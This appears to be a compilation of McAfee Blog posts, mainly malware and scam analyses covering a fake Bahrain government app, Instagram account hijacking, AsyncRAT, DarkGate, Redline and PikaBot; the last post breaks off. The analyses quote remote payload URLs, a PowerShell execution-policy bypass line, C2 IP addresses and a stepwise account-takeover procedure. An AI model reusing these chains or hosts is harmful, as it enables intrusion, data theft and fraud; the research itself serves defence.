It’s been almost two years since OpenAI launched ChatGPT, driving increased mainstream awareness of and access to Generative AI tools. In that time, new tools and solutions seem to be launching daily. There is also a growing trend of building bigger models that consume larger quantities of training data, often with mixed results ranging from hallucinations or categorically incorrect facts to the regurgitation of opinions as universal truth, proving the old adage that sometimes “less is more”.
So, if using more data doesn’t translate into better results… what does? It comes down to another tried and true saying – “quality over quantity.”
At McAfee, we maniacally focus on data quality. A well-developed Generative AI model is nothing without high-quality, curated datasets to fuel them. When the quantity of data is prioritized over quality, the results are often disappointing.
How do we produce quality data? Using millions of worldwide sensors, our AI engineers and AI data specialists focus on clues that point to threats. But that’s just the first step. Our teams then curate the data to improve the quality and maximize data diversity, reducing sources of bias, cross-pollinating data sources, and enriching and standardizing samples, just to name a few of the dozens of operations conducted to ensure we’re building datasets of the highest and purest quality.
All of this translates into the most comprehensive and robust AI-based protection for our customers: more than 1.5M threat detections per week across malware, scams, phishing, smishing, and more than half a billion web categorizations to help ensure a safe digital journey while browsing the Internet.
As the capabilities of AI tools increase, so does the conversation around how technology removes humans from the equation. The reality is that humans are still an integral part of the process and key to any successful Generative AI strategy. AI is only as good as the data it’s trained on, and in McAfee’s case, the guidance provided by cybersecurity experts. Thus, Cybersecurity AI specialists curating data is crucial to the development of all of our AI systems as it mitigates potential sources of error, resulting in accurate and trusted AI solutions, and allowing us to scale and share human expertise to better protect millions of customers worldwide.
Tackling cyber threats is a tall order that comes with intrinsic challenges. For example, modern scams are more subtle and less obvious even to experts, and quite often it is just the implicit intent that sets it apart from genuine (non-scam) content. Being context-aware can help navigate this landscape to more effectively detect and stop threats before they reach customers. What is more, we believe transparency and education are paramount for building a safer digital world. This is why we also invest in building explainable AI that helps users understand why a threat has been flagged and provides clues they can use to identify future threats.
The GenAI journey has only just begun. There is still a lot of work to do and a lot to look forward to as this technology continues to evolve. While it’s easy, as developers, to get caught up in the excitement, it’s also important to identify and focus on an ultimate goal and the responsible and safe steps to get there. At McAfee, we pledge to protect our customers, and we believe in the synergistic interaction between AI and Human Threat Intelligence. Together, we can deliver a trusted, world-class AI protection experience.
The post Quality Over Quantity: the Counter-Intuitive GenAI Key appeared first on McAfee Blog.
Authored by Dexter Shin
Many government agencies provide their services online for the convenience of their citizens. Also, if this service could be provided through a mobile app, it would be very convenient and accessible. But what happens when malware pretends to be these services?
McAfee Mobile Research Team found an InfoStealer Android malware pretending to be a government agency service in Bahrain. This malware pretends to be the official app of Bahrain and advertises that users can renew or apply for driver’s licenses, visas, and ID cards on mobile. Users who are deceived by advertisements that they are available on mobile will be provided with the necessary personal information for these services without a doubt. They reach users in various ways, including Facebook and SMS messages. Users who are not familiar with these attacks easily make the mistake of sending personal information.
In Bahrain, there’s a government agency called the Labour Market Regulatory Authority (LMRA). This agency operates with full financial and administrative independence under the guidance of a board of directors chaired by the Minister of Labour. They provide a variety of mobile services, and most apps provide only one service per app. However, this fake app promotes providing more than one service.
Figure 1. Legitimate official LMRA website
Figure 2. Fake app named LMRA
Excluding the most frequently found fake apps pretending LMRA, there are various fake apps included Bank of Bahrain and Kuwait (BBK), BenefitPay, a fintech company in Bahrain, and even apps pretending to be related to Bitcoin or loans. These apps use the same techniques as the LMRA fake apps to steal personal information.
Figure 3. Various fake apps using the same techniques
From the type of app that this malware pretends, we can guess that the purpose is financial fraud to use the personal information it has stolen. Moreover, someone has been affected by this campaign as shown in the picture below.
Figure 4. Victims of financial fraud (Source: Reddit)
They distribute these apps using Facebook pages and SMS messages. Facebook pages are fake and malware author is constantly creating new pages. These pages direct users to phishing sites, either WordPress blog sites or custom sites designed to download apps.
Figure 5. Facebook profile and page with a link to the phishing site
Figure 6. One of the phishing sites designed to download app
In the case of SMS, social engineering messages are sent to trick users into clicking a link so that they feel the need to urgently confirm.
Figure 7. Phishing message using SMS (Source: Reddit)
When the user launches the app, the app shows a large legitimate icon for users to be mistaken. And it asks for the CPR and phone number. The CPR number is an exclusive 9-digit identifier given to each resident in Bahrain. There is a “Verify” button, but it is simply a button to send information to the C2 server. If users input their information, it goes directly to the next screen without verification. This step just stores the information for the next step.
Figure 8. The first screen (left) and next screen of a fake app (right)
There are various menus, but they are all linked to the same URL. The parameter value is the CPR and phone numbers input by the user on the first screen.
Figure 9. All menus are linked to the same URL
The last page asks for the user’s full name, email, and date of birth. After inputting everything and clicking the “Send” button, all information inputted so far will be sent to the malware author’s c2 server.
Figure 10. All data sent to C2 server
After sending, it shows a completion page to trick the user. It shows a message saying you will receive an email within 24 hours. But it is just a counter that decreases automatically. So, it does nothing after 24 hours. In other words, while users are waiting for the confirmation email for 24 hours, cybercriminals will exploit the stolen information to steal victims’ financial assets.
Figure 11. Completion page to trick users
In addition, they have a payload for stealing SMS. This app has a receiver that works when SMS is received. So as soon as SMS comes, it sends an SMS message to the C2 server without notifying the user.
Figure 12. Payload for stealing SMS
We confirmed that there are two types of these apps. There is a type that implements a custom C2 server and receives data directly through web API, and another type is an app that uses Firebase. Firebase is a backend service platform provided by Google. Among many services, Firestore can store data as a database. This malware uses Firestore. Because it is a legitimate service provided by Google, it is difficult to detect as a malicious URL.
For apps that use Firebase, dynamically load phishing URLs stored in Firestore. Therefore, even if a phishing site is blocked, it is possible to respond quickly to maintain already installed victims by changing the URL stored in Firestore.
Figure 13. Dynamically loading phishing site loaded in webview
According to our detection telemetry data, there are 62 users have already used this app in Bahrain. However, since this data is a number at the time of writing, this number is expected to continue to increase, considering that new Facebook pages are still being actively created.
Recent malware tends to target specific countries or users rather than widespread attacks. These attacks may be difficult for general users to distinguish because malware accurately uses the parts needed by users living in a specific country. So we recommend users install secure software to protect their devices. Also, users are encouraged to download and use apps from official app stores like Google Play Store or Apple AppStore. If you can’t find an app in these stores, you must download the app provided on the official website.
McAfee Mobile Security already detects this threat as Android/InfoStealer. For more information, visit McAfee Mobile Security.
Samples:
SHA256 | Package Name | App Name |
6f6d86e60814ad7c86949b7b5c212b83ab0c4da65f0a105693c48d9b5798136c | com.ariashirazi.instabrowser | LMRA |
5574c98c9df202ec7799c3feb87c374310fa49a99838e68eb43f5c08ca08392d | com.npra.bahrain.five | LMRA Bahrain |
b7424354c356561811e6af9d8f4f4e5b0bf6dfe8ad9d57f4c4e13b6c4eaccafb | com.npra.bahrain.five | LMRA Bahrain |
f9bdeca0e2057b0e334c849ff918bdbe49abd1056a285fed1239c9948040496a | com.lmra.nine.lmranine | LMRA |
bf22b5dfc369758b655dda8ae5d642c205bb192bbcc3a03ce654e6977e6df730 | com.stich.inches | Visa Update |
8c8ffc01e6466a3e02a4842053aa872119adf8d48fd9acd686213e158a8377ba | com.ariashirazi.instabrowser | EasyLoan |
164fafa8a48575973eee3a33ee9434ea07bd48e18aa360a979cc7fb16a0da819 | com.ariashirazi.instabrowser | BTC Flasher |
94959b8c811fdcfae7c40778811a2fcc4c84fbdb8cde483abd1af9431fc84b44 | com.ariashirazi.instabrowser | BenefitPay |
d4d0b7660e90be081979bfbc27bbf70d182ff1accd829300255cae0cb10fe546 | com.lymors.lulumoney | BBK Loan App |
Domains:
Firebase(for C2):
The post Fake Bahrain Government Android App Steals Personal Data Used for Financial Fraud appeared first on McAfee Blog.
Authored by Vignesh Dhatchanamoorthy, Rachana S
Instagram, with its vast user base and dynamic platform, has become a hotbed for scams and fraudulent activities. From phishing attempts to fake giveaways, scammers employ a range of tactics to exploit user trust and vulnerability. These scams often prey on people’s desire for social validation, financial gain, or exclusive opportunities, luring them into traps that can compromise their personal accounts and identity.
McAfee has observed a concerning scam emerging on Instagram, where scammers are exploiting the platform’s influencer program to deceive users. This manipulation of the influencer ecosystem underscores the adaptability and cunning of online fraudsters in their pursuit of ill-gotten gains.
The Instagram influencer program, designed to empower content creators and influencers by providing opportunities for collaboration and brand partnerships, has inadvertently become a target for exploitation. Scammers are leveraging the allure of influencer status to lure unsuspecting individuals into fraudulent schemes, promising fame, fortune, and exclusive opportunities in exchange for participation.
The first step involves a cybercrook creating a dummy account and using it to hack into a target’s Instagram account. Using those hacked accounts hackers then share posts about Bitcoin and other cryptocurrencies. Finally, the hacked accounts are used to scam target friends with a request that they vote for them to win an influencer contest.
After this series of steps is complete, the scammer will first identify the target and then send them a link with a Gmail email address to vote in their favor.
Fig 1: Scammer Message
While the link in the voting request message likely leads to a legitimate Instagram page, victims are often directed to an Instagram email update page upon clicking — not the promised voting page. Also, since the account sending the voting request is likely familiar to the scam target, they are more likely to enter the scammer’s email ID without examining it closely.
During our research, we saw scammers like Instagram’s accounts center link to their targets like below hxxp[.]//accountscenter.instagram.com/personal_info/contact_points/contact_point_type=email&dialog_type=add_contact_point
Fig 2. Email Updating Page
We took this opportunity to gain more insight into the details of how these deceptive tactics are carried out, creating an email account (scammerxxxx.com and victimxxxx.com) and a dummy Instagram account using that email (victimxxxx.com) for testing purposes.
Fig 3. Victim’s Personal Details
We visited the URL provided in the chat and entered our testing email ID scammerxxxx.com instead of entering the email address provided by the scammer, which was “vvote8399@gmail.com”
Fig 4. Adding Scammer’s Email Address in Victim Account
After adding the scammerxxxx.com address in the email address field, we received a notification stating, “Adding this email will replace vitimxxxx.com on this Instagram account”.
This is the point at which a scam target will fall victim to this type of scam if they are not aware that they are giving someone else, with access to the scammerxxxx.com email address, control of their Instagram account.
After selecting Next, we were redirected to the confirmation code page. Here, scammers will send the confirmation code received in their email account and provide that code to victims, via an additional Instagram message, to complete the email updating process.
In our testing case, the verification code was sent to the email address scammerxxxx.com.
Fig 5. Confirmation Code Page
We received the verification code in our scammerxxxx.com account and submitted it on the confirmation code page.
Fig 6. Confirmation Code Mail
Once the ‘Add an Email Address’ procedure is completed, the scammer’s email address is linked to the victim’s Instagram account. As a result, the actual user will be unable to log in to their account due to the updated email address.
Fig 7. Victim’s Profile after updating Scammer’s email
Because the scammer’s email address (scammerxxxx.com) was updated the account owner — the scam victim will not be able to access their account and will instead receive the message “Sorry, your password was incorrect. Please double-check your password.”
Fig 8. Victim trying to login to their account.
The scammer will now change the victim’s account password by using the “forgot password” function with the new, scammer email login ID.
Fig 9. Forgot Password Page
The password reset code will be sent to the scammer’s email address (scammerxxxx.com).
Fig 10. Reset the Password token received in the Scammer’s email
After getting the email, the scammer will “Reset your password” for the victim’s account.
Fig 11. Scammer Resetting the Password
After resetting the password, the scammer can take over the victim’s Instagram account.
Fig 12. The scammer took over the victim’s Instagram account.
The post How Scammers Hijack Your Instagram appeared first on McAfee Blog.
Authored by Yashvi Shah and Preksha Saxena
AsyncRAT, also known as “Asynchronous Remote Access Trojan,” represents a highly sophisticated malware variant meticulously crafted to breach computer systems security and steal confidential data. McAfee Labs has recently uncovered a novel infection chain, shedding light on its potent lethality and the various security bypass mechanisms it employs.
It utilizes a variety of file types, such as PowerShell, Windows Script File (WSF), VBScript (VBS), and others within a malicious HTML file. This multifaceted approach aims to circumvent antivirus detection methods and facilitate the distribution of infection.
Figure 1: AsyncRAT prevalence for the last one month
The infection initiates through a spam email containing an HTML page attachment. Upon unwittingly opening the HTML page, an automatic download of a Windows Script File (WSF) ensues. This WSF file is deliberately named in a manner suggestive of an Order ID, fostering the illusion of legitimacy and enticing the user to execute it. Subsequent to the execution of the WSF file, the infection progresses autonomously, necessitating no further user intervention. The subsequent stages of the infection chain encompass the deployment of Visual Basic Script (VBS), JavaScript (JS), Batch (BAT), Text (TXT), and PowerShell (PS1) files. Ultimately, the chain culminates in a process injection targeting aspnet_compiler.exe.
Figure 2: Infection Chain
Upon opening a spam email, the recipient unwittingly encounters a web link embedded within its contents. Upon clicking on the link, it triggers the opening of an HTML page. Simultaneously, the page initiates the download of a WSF (Windows Script File), setting into motion a potentially perilous sequence of events.
Figure 3:HTML page
The HTML file initiates the download of a WSF file. Disguised as an order-related document with numerous blank lines, the WSF file conceals malicious intent. After its execution, no user interaction is required.
On executing wsf, we get the following process tree:
Figure 4: Process tree
Figure 5:Content of wsf file
The downloaded text file, named “1.txt,” contains specific lines of code. These lines are programmed to download another file, referred to as “r.jpg,” but it is actually saved in the public folder under the name “ty.zip.” Subsequently, this zip file is extracted within the same public folder, resulting in the creation of multiple files.
Figure 6: Marked files are extracted in a public folder
a) The “ty.zip” file comprises 17 additional files. Among these, the file named “basta.js” is the first to be executed. The content of “basta.js” is as follows:
Figure 7: basta.js
b) “basta.js” invoked “node.bat” file from the same folder.
Figure 8: node.js
Explaining the command present in node.bat:
To summarize, the command sets up a scheduled task called “cafee” which is designed to execute the “app.js” script found in the C:\Users\Public\ directory every 2 minutes. The primary purpose of this script is to maintain persistence on the system.
Figure 9: Schedule task entry
c) Now “app.js” is executed and it executes “t.bat” from the same folder.
Figure 10:app.js
d) “t.bat” has little obfuscated code which after concatenating becomes: “Powershell.exe -ExecutionPolicy Bypass -File “”C:\Users\Public\t.ps1”
Figure 11: Content of t.bat
e) Now the powershell script “t.ps1” is invoked. This is the main script that is responsible for injection.
Figure 12: Content of t.ps1
There are 2 functions defined in it:
A) function fun_alosh()
This function is used in the last for decoding $tLx and $Uk
B) Function FH ()
This function is used only once to decode the content of “C:\\Users\\Public\\Framework.txt”. This function takes a binary string as input, converts it into a sequence of ASCII characters, and returns the resulting string.
Figure 13: Content of Framework.txt
After decoding the contents of “C:\Users\Public\Framework.txt” using CyberChef, we are able to reveal the name of the final binary file targeted for injection.
Figure 14: Binary to Hex, Hex to Ascii Conversion using CyberChef
This technique aims to evade detection by concealing suspicious keywords within the script. Same way other keywords are also stored in txt files, such as:
Content of other text files are:
Figure 15: Content of other files
After replacing all the names and reframing sentences. Below is the result.
Figure 16: Injection code
Now, the two variables left are decrypted by fun_alosh.
After decrypting and saving them, it was discovered that both files are PE files, with one being a DLL ($tLx) and the other an exe ($Uk).
Figure 17: Decoded binaries
Process injection in aspnet_compiler.exe.
Figure 18: Process injection in aspnet_compiler.exe
Once all background tasks are finished, a deceptive Amazon page emerges solely to entice the user.
Figure 19: Fake Amazon page
The Dll file is packed with confuserEX and as shown, the type is mentioned ‘NewPE2.PE’ and Method is mentioned ‘Execute’.
Figure 20: Confuser packed DLL
The second file is named AsyncClient123 which is highly obfuscated.
Figure 21: AsyncRat payload
To summarize the main execution flow of “AsyncRAT”, we can outline the following steps:
The decrypting function is used to decrypt strings.
Figure 22: Decrypting Function
The program creates a mutex to prevent multiple instances from running simultaneously.
Figure 23: Creating Mutex
Figure 24: Mutex in process explorer
Checking the presence of a debugger.
Figure 25: Anti analysis code
Collecting data from the system.
Figure 26: Code for collecting data from system
Establish a connection with the server.
Figure 27: Code for C2 connection
Process injection in aspnet_compiler.exe:
Figure 28: C2 communication
In this blog post, we dissect the entire attack sequence of AsyncRAT, beginning with an HTML file that triggers the download of a WSF file, and culminating in the injection of the final payload. Such tactics are frequently employed by attackers to gain an initial foothold. We anticipate a rise in the utilization of these file types following Microsoft’s implementation of protections against malicious Microsoft Office macros, which have also been widely exploited for malware delivery. McAfee labs consistently advise users to refrain from opening files from unknown sources, particularly those received via email. For organizations, we highly recommend conducting security training for employees and implementing a secure web gateway equipped with advanced threat protection. This setup enables real-time scanning and detection of malicious files, enhancing organizational security.
Avoiding falling victim to email phishing involves adopting a vigilant and cautious approach. Here are some common practices to help prevent falling prey to email phishing:
File | SHA256 |
HTML | 969c50f319a591b79037ca50cda55a1bcf2c4284e6ea090a68210039034211db |
WSF | ec6805562419e16de9609e2a210464d58801c8b8be964f876cf062e4ab52681a |
ty.zip | daee41645adcf22576def12cb42576a07ed5f181a71d3f241c2c14271aad308b |
basta.js | 909ec84dfa3f2a00431a20d4b8a241f2959cac2ea402692fd46f4b7dbf247e90 |
node.bat | 569e33818e6af315b5f290442f9e27dc6c56a25259d9c9866b2ffb4176d07103 |
app.js | 7d8a4aa184eb350f4be8706afb0d7527fca40c4667ab0491217b9e1e9d0f9c81 |
t.bat | e2d30095e7825589c3ebd198f31e4c24e213d9f43fc3bb1ab2cf06b70c6eac1d |
t.ps1 | a0c40aa214cb28caaf1a2f5db136bb079780f05cba50e84bbaeed101f0de7fb3 |
exe | 0d6bc7db43872fc4d012124447d3d050b123200b720d305324ec7631f739d98d |
dll | b46cd34f7a2d3db257343501fe47bdab67e796700f150b8c51a28bb30650c28f |
URL | hxxp://142.202.240[.]40:222/1.txt |
URL | hxxp://142.202.240[.]40:222/r.jpg |
The post From Spam to AsyncRAT: Tracking the Surge in Non-PE Cyber Threats appeared first on McAfee Blog.
Authored by Yashvi Shah, Lakshya Mathur and Preksha Saxena
McAfee Labs has recently uncovered a novel infection chain associated with DarkGate malware. This chain commences with an HTML-based entry point and progresses to exploit the AutoHotkey utility in its subsequent stages. DarkGate, a Remote Access Trojan (RAT) developed using Borland Delphi, has been marketed as a Malware-as-a-Service (MaaS) offering on a Russian-language cybercrime forum since at least 2018. This malicious software boasts an array of functionalities, such as process injection, file download and execution, data theft, shell command execution, keylogging capabilities, among others. Following is the spread of DarkGate observed in our telemetry for last three months:
Figure 1: Geo-Distribution of DarkGate
Additionally, DarkGate incorporates numerous evasion tactics to circumvent detection. DarkGate notably circumvented Microsoft Defender SmartScreen, prompting Microsoft to subsequently release a patch to address this vulnerability.
In the previous year, CVE-2023-36025 (https://nvd.nist.gov/vuln/detail/CVE-2023-36025 ) was identified and subsequently patched https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36025 . CVE-2023-36025 is a vulnerability impacting Microsoft Windows Defender SmartScreen. This flaw arises from the absence of proper checks and corresponding prompts related to Internet Shortcut (.url) files. Cyber adversaries exploit this vulnerability by creating malicious .url files capable of downloading and executing harmful scripts, effectively evading the warning and inspection mechanisms of Windows Defender SmartScreen. This year, same way, CVE-2024-21412 (https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21412 ) was identified and patched. This vulnerability is about “Internet Shortcut Files Security Feature Bypass Vulnerability”.
McAfee Labs has identified two distinct initial vectors carrying identical DarkGate shellcode and payload. The first vector originates from an HTML file, while the second begins with an XLS file. We will delve into each chain individually to unveil their respective mechanisms. Below is the detailed infection chain for the same:
Figure 2: Infection Chain
The infection chain initiates with a phishing HTML page masquerading as a Word document. Users are prompted to open the document in “Cloud View” (shown in the figure below), creating a deceptive lure for unwitting individuals to interact with malicious content.
Figure 3: HTML page
Upon clicking “Cloud View,” users are prompted to grant permission to open Windows Explorer, facilitating the subsequent redirection process.
Figure 4: Prompt confirming redirection to Windows Explorer
Upon granting permission and opening Windows Explorer, users encounter a file depicted within the Windows Explorer interface. The window title prominently displays “\\onedrive.live.com,” adding a veneer of legitimacy to the purported “Cloud View” experience.
Figure 5: Share Internet Shortcut via SMB
In our investigation, we sought to trace the origin of the described phishing scheme back to its parent HTML file. Upon inspection, it appears that the highlighted content in the image may be a string encoded in reverse Base64 format. This suspicion arises from the presence of a JavaScript function (shown in the figure below) designed to reverse strings, which suggests an attempt to decode or manipulate encoded data.
Figure 6: Javascript in HTML code
On reversing and base64 decoding the yellow highlighted content in Figure 6, we found:
Figure 7: WebDAV share
The URL utilizes the “search-ms” application protocol to execute a search operation for a file named “Report-26-2024.url”. The “crumb” parameter is employed to confine the search within the context of the malicious WebDAV share, restricting its scope. Additionally, the “DisplayName” element is manipulated to mislead users into believing that the accessed resource is associated with the legitimate “onedrive.live.com” folder, thereby facilitating deception.
Hence, the presence of “onedrive.live.com” in the Windows Explorer window title is a direct consequence of the deceptive manipulation within the URL structure.
The file is an Internet Shortcut (.url) file, containing the following content:
Figure 8: content of .URL file
The .url files serve as straightforward INI configuration files, typically consisting of a “URL=” parameter indicating a specific URL. In our scenario, the URL parameter is defined as follows: URL=file://170.130.55.130/share/a/Report-26-2024.zip/Report-26-2024.vbs.
Upon execution of the .url file, it will initiate the execution of the VBScript file specified in the URL parameter. This process allows for the automatic execution of the VBScript file, potentially enabling the execution of malicious commands or actions on the system.
The vulnerability CVE-2023-36025 (https://nvd.nist.gov/vuln/detail/CVE-2023-36025 ) pertains to Microsoft Windows Defender SmartScreen failing to issue a security prompt prior to executing a .url file from an untrusted source. Attackers exploit this by constructing a Windows shortcut (.url) file that sidesteps the SmartScreen protection prompt. This evasion is achieved by incorporating a script file as a component of the malicious payload delivery mechanism. Although Microsoft has released a patch https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36025 to address this vulnerability, it remains exploitable in unpatched versions of Windows.
If your system is not patched and updated, you will not see any prompt. However, if your system is updated, you will encounter a prompt like:
Figure 9: SmartScreen prompt
On allowing execution, the vbs file is dropped at C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\U4IRGC29. This file will run automatically on execution of url file and we get the following process tree:
Figure 10: Process tree
Following are the command lines:
The sequence of commands begins with the execution of the VBScript file located at “C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\U4IRGC29\Report-26-2024[1].vbs”. This VBScript subsequently utilizes PowerShell to execute a script obtained from the specified URL (‘withupdate.com/zuyagaoq’) via the Invoke-RestMethod cmdlet. Upon executing the downloaded script, it proceeds to command and execute the AutoHotkey utility, employing a script located at the designated path (C:/rjtu/script.ahk). Subsequently, the final command utilizes the attrib tool to set the hidden attribute (+h) for the specified directory (C:/rjtu/).
Inspecting the URL “withupdate.com/zuyagaoq” explicitly allows for a detailed understanding of the infection flow:
Figure 11: Remote Script on the C2
This URL leads to a script:
Figure 13: Remote script content
Explanation of the script:
Checking “C:/rjtu”:
Figure 14: Dropped folder
AutoHotkey is a scripting language that allows users to automate tasks on a Windows computer. It can simulate keystrokes, mouse movements, and manipulate windows and controls. By writing scripts, users can create custom shortcuts, automate repetitive tasks, and enhance productivity.
To execute an AutoHotkey script, it is passed as a parameter to the AutoHotkey executable (autohotkey.exe).
Following is the ahk script file content:
Figure 15: Content of .ahk script
There are a lot of comments added in the script, simplifying the script, we get:
Figure 16: .ahk script after removing junk
This script reads the content of “test.txt” into memory, allocates a memory region in the process’s address space, writes the content of “test.txt” as hexadecimal bytes into that memory region, and finally, it executes the content of that memory region as a function. This script seems to be executing instructions stored in “test.txt”.
Now, it’s confirmed that the shellcode resides within the contents of “test.txt”. This is how the text.txt appears:
Figure 17: Content of test.txt
We analyzed the memory in use for Autohotkey.exe.
Figure 19: Memory dump of running AutoHotKey.exe same as test.txt
This is the shellcode present here. The first 6 bytes are assembly instructions:
Following the jump instructions of 3bf bytes, we reach the same set of instructions again:
Figure 21: Same Shellcode A after jump
This means another jump with be taken for another 3bf bytes:
Figure 22: Same Shellcode A one more time
We have encountered same set of instructions again, taking another jump we reach to:
Figure 23: New Shellcode B found next.
These bytes are again another shellcode and the region highlighted in yellow(in the figure below) is a PE file. The Instruction pointer is not at the PE currently. This shellcode needs to be decoded first.
Figure 24: Shellcode B followed by PE file highlighted
This shellcode suggests adding 71000 to the current offset and instruction pointer will be at the new location. The current offset is B3D, adding 71000 makes it 71B3D. Checking 71B3D, we get:
Figure 25: After debugging found next Shellcode C
This is again now one more set of instructions in shellcode. This is approximately 4KB in size and is appended at the end of the file.
Figure 26: Shellcode C directing to entry point of the PE file
Upon debugging this code, we figured out that in marked “call eax” instruction, eax has the address of the entry point of the final DarkGate payload. Hence this instruction finally moves the Instruction Pointer to the entry point of the PE file. This goes to the same region marked in yellow in Figure 24.
This is the final DarkGate payload which is a Delphi-compiled executable file:
Figure 27: Darkgate payload.
Upon this, we see all the network activity happening to C2 site:
Figure 28: Network Communication
Figure 29: C2 IP address
The exfiltration is done to the IP address 5.252.177.207.
Persistence:
For maintaining persistence, a .lnk file is dropped in startup folder:
Figure 30: Persistence
Content of lnk file:
Figure 31: Content of .lnk used for persistence
The shortcut file (lnk) drops a folder named “hakeede” in the “C:\ProgramData” directory.
Figure 32: Folder dropped in “C:\ProgramData”
Inside this folder, all the same files are present:
Figure 33: Same set of files present in dropped folder
Again, the ahk file is executed with the help of Autohotkey.exe and shellcode present in test.txt is executed. These files have the same SHA256 value, differing only in their assigned names.
Infection from XLS:
The malicious excel file asks the user to click on “Open” to view the content properly.
Figure 34: XLS sample
Upon clicking on “Open” button, user gets the following prompt warning the user before opening the file.
Figure 35: XLS files trying to download and run VBS file
For our analysis, we allowed the activity by clicking on “OK”. Following this we got the process tree as:
Figure 36: Process tree from Excel file
The command lines are:
The file it gets from “103.124.106[.]237/wctaehcw” has the following content:
Figure 37: Remote script simliar to previous chain
From this point onward, the infection process mirrors the previously discussed chain. All three files, including AutoHotKey.exe, a script file, and a text file, are downloaded, with identical artifacts observed throughout the process.
Mitigation:
Indicators of Compromise (IoCs):
File | Hash |
Html file | 196bb36f7d63c845afd40c5c17ce061e320d110f28ebe8c7c998b9e6b3fe1005 |
URL file | 2b296ffc6d173594bae63d37e2831ba21a59ce385b87503710dc9ca439ed7833 |
VBS | 038db3b838d0cd437fa530c001c9913a1320d1d7ac0fd3b35d974a806735c907 |
autohotkey.exe | 897b0d0e64cf87ac7086241c86f757f3c94d6826f949a1f0fec9c40892c0cecb |
AHK script | dd7a8b55e4b7dc032ea6d6aed6153bec9b5b68b45369e877bb66ba21acc81455 |
test.txt | 4de0e0e7f23adc3dd97d498540bd8283004aa131a59ae319019ade9ddef41795 |
DarkGate exe | 6ed1b68de55791a6534ea96e721ff6a5662f2aefff471929d23638f854a80031 |
IP | 5.252.177.207 |
XLS file | 1a960526c132a5293e1e02b49f43df1383bf37a0bbadd7ba7c106375c418dad4 |
VBS | 2e34908f60502ead6ad08af1554c305b88741d09e36b2c24d85fd9bac4a11d2f |
LNK file | 10e362e18c355b9f8db9a0dbbc75cf04649606ef96743c759f03508b514ad34e |
IP | 103.124.106.237 |
Table 1: IOC table
The post The Darkgate Menace: Leveraging Autohotkey & Attempt to Evade Smartscreen appeared first on McAfee Blog.
Authored by Mohansundaram M and Neil Tyagi
Source: Add a Custom Script to Windows Setup | Microsoft Learn
We can confirm that c:\WINDOWS\system32\oobe\Setup.exe launches cmd.exe with ErrorHandler.cmd script as argument, which runs NzUw.exe(compiler.exe)
Before loading the luajit bytecode, a new state is created. Each Lua state maintains its global environment, stack, and set of loaded libraries, providing isolation between different instances of Lua code.
Cheat.Lab.2.7.2.zip | 5e37b3289054d5e774c02a6ec4915a60156d715f3a02aaceb7256cc3ebdc6610 |
Cheat.Lab.2.7.2.zip |
https[:]//github[.]com/microsoft/vcpkg/files/14125503/Cheat.Lab.2.7.2.zip
|
lua51.dll | 873aa2e88dbc2efa089e6efd1c8a5370e04c9f5749d7631f2912bcb640439997 |
readme.txt | 751f97824cd211ae710655e60a26885cd79974f0f0a5e4e582e3b635492b4cad |
compiler.exe | dfbf23697cfd9d35f263af7a455351480920a95bfc642f3254ee8452ce20655a |
Redline C2 | 213[.]248[.]43[.]58 |
Trojanised Git Repo | hxxps://github.com/microsoft/STL/files/14432565/Cheater.Pro.1.6.0.zip |
The post Redline Stealer: A Novel Approach appeared first on McAfee Blog.
Authored by Anuradha and Preksha
PikaBot is a malicious backdoor that has been active since early 2023. Its modular design is comprised of a loader and a core component. The core module performs malicious operations, allowing for the execution of commands and the injection of payloads from a command-and-control server. The malware employs a code injector to decrypt and inject the core module into a legitimate process. Notably, PikaBot employs distribution methods, campaigns, and behavior reminiscent of Qakbot.
PikaBot, along with various other malicious loaders like QBot and DarkGate, heavily depends on email spam campaigns for distribution. Its initial access strategies are intricately crafted, utilizing geographically targeted spam emails tailored for specific countries. These emails frequently include links to external Server Message Block (SMB) shares hosting malicious zip files.
SMB shares refer to resources or folders on a server or computer accessible to other devices or users on a network using the SMB protocol. The threat actors frequently exploit such shares for malware distribution. In this instance, the act of downloading and opening the provided zip file leads to PikaBot infection.
During February 2024, McAfee Labs observed a significant change in the campaigns that distribute Pikabot.
Pikabot is distributed through multiple file types for various reasons, depending on the objectives and nature of the attack. Using multiple file types allows attackers to exploit diverse attack vectors. Different file formats may have different vulnerabilities, and different ways of detection by security software so attackers may try various formats to increase their chances of success and evade detection by bypassing specific security measures.
Attackers often use file types that are commonly trusted by users, such as Zip or Office documents, to trick users into opening them. By using familiar file types, attackers increase the likelihood that their targets will interact with the malicious content. Malware authors use HTML with JavaScript features as attachments, a common technique, particularly when email formatting is converted to plain text, resulting in the attachment of the HTML content directly to the email. Attackers use SMB to propagate across the network and may specifically target SMB shares to spread their malware efficiently. Pikabot takes advantage of the MonikerLink bug and attaches an SMB link in the Outlook mail itself.
Figure 1. Distinctive Campaigns of Pikabot
Attackers demonstrated a diverse range of techniques and infection vectors in each campaign, aiming to deliver the Pikabot payload. Below we have summarized the infection vector that has been used in each campaign.
It is uncommon for an adversary to deploy so many attack vectors in the span of a month.
In this section, a comprehensive breakdown of the analysis for each campaign is presented below.
In this campaign, Pikabot is distributed through a zip file that includes an HTML file. This HTML file then proceeds to download a text file, ultimately resulting in the deployment of the payload.
The below HTML code is a snippet from the malware where it is a properly aligned HTML that has a body meta redirection to a remote text file hosted at the specified URL. There are distractions in the HTML which are not rendered by the browser.
Figure 2.HTML Code
The above highlighted meta tag triggers an immediate refresh of the page and redirects the browser to the specified URL: ‘file://204.44.125.68/mcqef/yPXpC.txt’. This appears to be a file URL, pointing to a text file on a remote server.
Here are some reasons why an attacker might choose a meta tag refresh over traditional redirects:
Stealth and Evasion: Meta tag refreshes can be less conspicuous than HTTP redirects. Some security tools and detection mechanisms may be more focused on identifying and blocking known redirect patterns.
Client-Side Execution: Meta tag refreshes occur on the client side (in the user’s browser), whereas HTTP redirects are typically handled by the server. This may allow attackers to execute certain actions directly on the user’s machine, making detection and analysis more challenging.
Dynamic Behavior: Meta tag refreshes can be dynamically generated and inserted into web pages, allowing attackers to change the redirection targets more easily and frequently. This dynamic behavior can make it harder for security systems to keep up with the evolving threat landscape.
In this campaign, McAfee blocks the HTML file.
Figure 3.HTML file
Distributed through a compressed zip file, the package includes a .js file that subsequently initiates the execution of curl.exe to retrieve the payload.
Infection Chain:
.zip->.js->curl->.exe
Code snippet of .js file:
Figure 4. Javascript Code
